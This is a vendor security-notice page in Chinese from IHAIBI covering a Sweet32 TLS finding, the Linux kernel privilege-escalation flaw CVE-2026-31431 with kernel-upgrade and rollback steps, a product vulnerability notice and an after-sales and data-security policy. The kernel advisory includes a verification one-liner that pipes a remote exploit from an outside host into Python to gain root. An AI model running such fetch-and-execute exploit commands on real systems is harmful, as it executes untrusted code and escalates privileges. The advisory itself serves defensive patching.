
涉及到IHAIBI/海比 所有系统:包含不限于视频点播系统、视频直播系统、视频录播系统、信息发布系统等流媒体系统与应用产品。如需升级,请联系IHAIBI/海比售后客服。漏洞名称SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】风险等级:高高可利用:否CVE编号:CVE-2016-2183端口(服务):6443(SSL)风险描述:OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。TLS、SSH和IPSec协议和其它协议及产品中使用的DES和Triple DES密码算法存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。风险影响:TLS、SSH 和 IPSec 协议以及其他协议和产品中使用的 DES 和 Triple DES 密码的生日限制约为 40 亿个块,这使得远程攻击者更容易通过生日攻击获取明文数据长时间的加密会话,如 CBC 模式下使用 Triple DES 的 HTTPS 会话所示,也称为“Sweet32”攻击解决方案:禁用DES和Triple DES加密算法参考资料:https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201608-448 https://sweet32.info/

涉及到IHAIBI/海比 所有系统:包含不限于视频点播系统、视频直播系统、视频录播系统、信息发布系统等流媒体系统与应用产品。如需升级,请联系IHAIBI/海比售后客服。适用于Rocky操作系统,系统版本为9.6+,内核版本大于4.14 ,如果是升级,可以直接跳过复现步骤。另外,漏洞验证过程是在测试环境,未有相关业务系统在运行。建议生产进行处置的过程中,采用逐步分阶段执行,优先从非重要业务系统开始,留有相关观察周期。 1、漏洞描述CVE-2026-31431(又称 Copy Fail)是 Linux 内核 crypto 子系统中的一个高危本地提权漏洞,问题位于 algif_aead 模块,即内核 userspace crypto API 的 AEAD socket 接口(AF_ALG)。该漏洞可通过 AF_ALG + splice() 影响内核 page cache,攻击者在已能于节点上执行用户态代码的前提下,可能进一步提权至节点 root,或产生跨容器影响(同一宿主机上的进程共享内核 page cache)。Linux kernel 社区对该漏洞的修复描述为:crypto: algif_aead - Revert to operating out-of-place2、漏洞复现1、查看操作系统的内核版本信息Plain Text[jsber@qmt ~]$ uname -r5.14.0-570.17.1.el9_6.x86_642、漏洞验证服务器能够访问外网的情况下,直接使用在线验证脚本:curl https://copy.fail/exp | python3.12 && su , 然后使用 id 命令,可以看到系统权限为root,能够完成提权操作。具体结果如下图: 注意点:这个测试脚本验证脚本使用环境是python 3.10 + ,Rocky 9.6默认的python环境为3.9,所以需要部署python高版本环境,如下是相关编译安装python的步骤仅供参考:Shell# 离线环境:提前下载所有依赖包,上传后批量安装cd /usr/local/srcwget https://mirrors.tuna.tsinghua.edu.cn/python/3.12.3/Python-3.12.3.tgztar -xzf Python-3.12.3.tgzcd Python-3.12.3# 配置(启用优化,不覆盖系统Python)./configure --enable-optimizations --prefix=/usr/local/python3.12# 编译(用所有CPU核心加速,约10-20分钟)make -j $(nproc)# 安装(altinstall 不覆盖系统默认python3)make altinstallln -sf /usr/local/python3.12/bin/python3.12 /usr/bin/python3.12ln -sf /usr/local/python3.12/bin/pip3.12 /usr/bin/pip3.12python3.12 --versionpip3.12 --version 3、升级内核措施由于Rocky内核直接编译了该存在漏洞的模块,没有办法卸载相关的模块。故需要直接升级内核。 下载相关资源包:https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-5.14.0-611.54.1.el9_7.x86_64.rpmhttps://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpmhttps://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpmhttps://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpm 1、下载好相关的包文件,或者不适用wget,使用我提供的压缩包文件。然后再进行rpm安装Bash# 安装相关下载的内核包:mkdir /root/kernel-rpm cd /root/kernel-rpm wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-5.14.0-611.54.1.el9_7.x86_64.rpmwget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpmwget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpmwget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpmwget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-tools-libs-5.14.0-611.54.1.el9_7.x86_64.rpmwget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-tools-5.14.0-611.54.1.el9_7.x86_64.rpmrpm -ivh \kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpm \kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpm \kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpm \kernel-5.14.0-611.54.1.el9_7.x86_64.rpm 2、验证相关内核文件的安装情况Shell[root@qmt kernel-rpm]# rpm -qa | grep kernel | sortkernel-5.14.0-570.17.1.el9_6.x86_64kernel-5.14.0-611.54.1.el9_7.x86_64kernel-core-5.14.0-570.17.1.el9_6.x86_64kernel-core-5.14.0-611.54.1.el9_7.x86_64kernel-headers-5.14.0-570.30.1.el9_6.x86_64kernel-modules-5.14.0-570.17.1.el9_6.x86_64kernel-modules-5.14.0-611.54.1.el9_7.x86_64kernel-modules-core-5.14.0-570.17.1.el9_6.x86_64kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64kernel-srpm-macros-1.0-13.el9.noarchkernel-tools-5.14.0-570.17.1.el9_6.x86_64kernel-tools-libs-5.14.0-570.17.1.el9_6.x86_643、列出系统启动分区/boot下的所有内核可执行启动镜像,验证新内核的启动文件是否正确生成并放入启动分区。Bash# 列出系统启动分区/boot下的所有内核可执行启动镜像,验证新内核的启动文件是否正确生成并放入启动分区。ls -l /boot/vmlinuz-*-rwxr-xr-x. 1 root root 14916424 Aug 7 2025 /boot/vmlinuz-0-rescue-db0960be52c24c74aa19825dfdd7b692-rwxr-xr-x. 1 root root 14916424 May 24 2025 /boot/vmlinuz-5.14.0-570.17.1.el9_6.x86_64-rwxr-xr-x 1 root root 15117128 May 6 01:28 /boot/vmlinuz-5.14.0-611.54.1.el9_7.x86_644、检查新内核对应的initramfs临时根文件系统镜像是否存在,这个文件是新内核能正常启动的必备文件。Bashls -l /boot/initramfs-5.14.0-611.54.1.el9_7.x86_64.img5、为新内核手动生成启动必需的initramfs镜像,解决镜像缺失的问题,保证新内核能正常引导启动Bashdracut -f /boot/initramfs-5.14.0-611.54.1.el9_7.x86_64.img 5.14.0-611.54.1.el9_7.x86_646、重启操作系统systemctl reboot ,再次查看内核版本: 以上就完成了内核升级。4、回退措施1、查看当前系统中的内核:Shell[root@qmt jsber]# ls -l /boot/loader/entries/total 12-rw-r--r--. 1 root root 466 Aug 7 2025 db0960be52c24c74aa19825dfdd7b692-0-rescue.conf-rw-r--r--. 1 root root 414 Aug 7 2025 db0960be52c24c74aa19825dfdd7b692-5.14.0-570.17.1.el9_6.x86_64.conf-rw-r--r-- 1 root root 413 May 9 16:27 db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf可以看到返回的两个:• 新版本内核: db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64• 旧版本内核: db0960be52c24c74aa19825dfdd7b692-5.14.0-570.17.1.el9_6.x86_64 2、备份新版本内核之后,再删除新版本内核Shell[root@qmt jsber]# cp /boot/loader/entries/db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf /root/[root@qmt jsber]# rm -f /boot/loader/entries/db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf3、更新 GRUB 配置并重启Shell[root@qmt jsber]# grub2-mkconfig -o /boot/grub2/grub.cfg# 安全重启[root@qmt jsber]# systemctl reboot4、重启之后再次查看版本引用:Shell[jsber@qmt ~]$ uname -r5.14.0-570.17.1.el9_6.x86_64 涉及IHAIBI/海比 全系列产品。

涉及产品:1、海比视频管理系统 v2.0/V3.0/V4.0/V5.02、海比信息发布系统 V3.03、海比录播资源管理系统 V3.04、海比电子班牌系统 V3.05、海比城市级信息发布系统 V2.0/V3.06、海比智能媒资系统 V3.07、海比IP播出系统 V1.08、海比融合云视频管理系统 V2.0注:系统布署于公共网(包含不限于互联网、城域网、教育网、政务网等)的用户,需尽快升级。修复内容:高危漏洞:2个1、通过某种方式绕过认证加密密钥,可以在未授权查看或修改到该系统的文件;2、sql注入和信息泄露相关漏洞;低危漏洞:4个修复方式:系统在线升级,或者申请技术支持【info@ihaibi.com】。【2025-01-27】

为保障用户合法权益,规范我司产品售后与安全维保服务,落实数据安全与个人信息保护义务,依据《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等相关法律法规,现就我司 IHAIBI 系列软件产品(以下简称“产品”)的售后、安全维保及数据安全相关事宜告示如下,敬请用户知悉并遵守: 一、售后服务相关说明 (一)服务范围我司为 IHAIBI 软件产品用户提供以下售后服务: 1. 产品安装与部署指导; 2. 产品功能故障排查与修复; 3. 产品使用咨询与操作指导; 4. 符合约定条件的产品版本升级支持。(二)服务期限 1. 免费售后服务期限:自产品正式交付并验收合格之日起【XX】年(具体期限以产品采购合同或服务协议约定为准); 2. 免费服务期限届满后,用户可通过购买付费售后增值服务延续服务支持,具体服务内容与收费标准以双方另行签订的协议为准(如软件放置外网(包含不限于互联网、城域网、教育网、政务网等公共网络),则每年的延保费用按合同总金额的15%收取,不足5000元,按5000元结算)。 3、硬件的则为有偿维修,按实际更换的零件来结算。(三)除外情形以下情形不属于免费售后服务范围,我司可根据用户需求提供付费服务: 1. 因用户未按照产品操作手册或官方指导规范使用产品导致的故障; 2. 因用户自行改装、破解产品程序或更换非官方指定配件导致的问题; 3. 因不可抗力(如地震、火灾、洪水等自然灾害,战争、政策调整等社会事件)导致的产品损坏或功能异常; 4. 非我司授权服务人员维修操作导致的二次故障。二、安全维保服务相关说明(一)维保责任边界 1. 我司承诺,在产品安全维保期限内(与免费售后服务期限一致,具体以合同为准),将持续为产品提供安全维护服务,保障产品符合相关国家标准的强制性要求,不设置任何恶意程序; 2. 安全维保服务内容包括: IHAIBI 产品安全漏洞监测、安全补丁推送与安装指导、安全风险评估与整改建议、安全事件应急响应支持。(二)漏洞处理机制 1. 我司建立常态化产品安全漏洞监测机制,一旦发现产品存在安全缺陷、漏洞等风险,将立即采取补救措施,并按照规定及时告知用户及相关主管部门; 2. 用户发现产品安全漏洞时,可通过官方漏洞反馈渠道(详见本告示第四部分)向我司报告,我司将在收到报告后【1】个工作日内进行核实,并根据漏洞危害等级及时反馈处理方案:(1)高危漏洞:立即启动应急响应,【2】小时内提供临时防护措施,【3】个工作日内推送正式修复补丁;(2)中低危漏洞:在后续常规更新中完成修复,并向用户说明风险防范建议。(三)过保后的安全处理 1. 安全维保期限届满后,我司可终止免费安全维保服务,用户可通过购买付费延保服务继续获得安全支持; 2. 即使超出维保期限,若发现产品存在可能危及国家安全、公共利益或用户重大合法权益的重大安全漏洞,我司仍将履行法定告知义务,及时向用户和有关主管部门报告,并提供必要的风险防范指引; 3. 针对关键信息基础设施用户使用的IHAIBI产品,我司将按照相关法律法规要求,提供更长期限的安全维保支持或专项安全保障方案。三、数据安全与个人信息保护相关说明(一)信息收集与使用规范 1. 我司仅在实现产品功能、提供服务或履行法定义务的必要范围内,向用户收集个人信息或业务数据,收集的信息种类、范围及目的将向用户明示,并获得用户同意; 2. 我司将严格按照明示的目的使用收集的信息,未经用户另行授权,不擅自将信息用于其他目的,不向第三方非法提供用户信息(法律法规另有规定或经用户明确同意的除外)。(二)数据安全保障措施 1. 我司建立健全全流程数据安全管理制度,落实数据分类分级保护要求,采取加密存储、访问权限管控、安全审计、入侵检测等技术措施,保障用户数据的保密性、完整性和可用性; 2. 定期开展数据安全风险评估,及时排查并整改数据安全隐患,防止数据泄露、篡改、丢失。(三)用户数据权利保障 1. 用户对其个人信息享有知情权、决定权,有权限制或拒绝我司对其个人信息的处理(法律法规另有规定的除外); 2. 用户可通过官方渠道向我司申请查阅、复制、更正、补充其个人信息,若处理目的已实现、保存期限届满或用户撤回同意,可申请删除个人信息,我司将在收到申请后【1】个工作日内核实并依法办理; 3. 若发生或可能发生用户数据泄露、篡改、丢失等安全事件,我司将立即采取补救措施,并按照规定及时告知用户及相关主管部门,告知内容包括事件概况、补救措施及用户减轻危害的建议。(四)数据保存与销毁 1. 我司将按照“最小必要、最短时间”原则保存用户数据,超出保存期限的,将自动予以匿名化处理或安全销毁; 2. 当产品停止提供服务时,我司将提前【20】日告知用户,并为用户提供数据导出通道,确保用户数据安全转移。四、联系方式与反馈渠道 1. 售后服务与安全维保咨询:客服热线【025-8645 6939】,官方邮箱【info@ihaibi.com】; 2. 安全漏洞反馈:漏洞反馈专线【025-8645 6939】,漏洞反馈邮箱【info@ihaibi.com Sunfei@ihaibi.com】; 3. 数据安全与个人信息相关咨询及投诉:隐私保护专员邮箱【info@ihaibi.com】; 4. 官方网站:【https://www.ihaibi.com】(可查阅完整的服务条款、隐私政策及安全公告)。五、附则 1. 本告示书未尽事宜,均以《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等相关法律法规及双方签订的产品采购合同、服务协议为准; 2. 我司有权根据法律法规更新或业务调整,对本告示书内容进行修订,修订后的告示书将通过官方网站公示,公示满【3】日后生效,若用户继续使用产品,即视为认可修订后的内容; 3. 本告示书自发布之日起生效。【南京海比信息技术有限公司】【发布日期:2026年1月27日】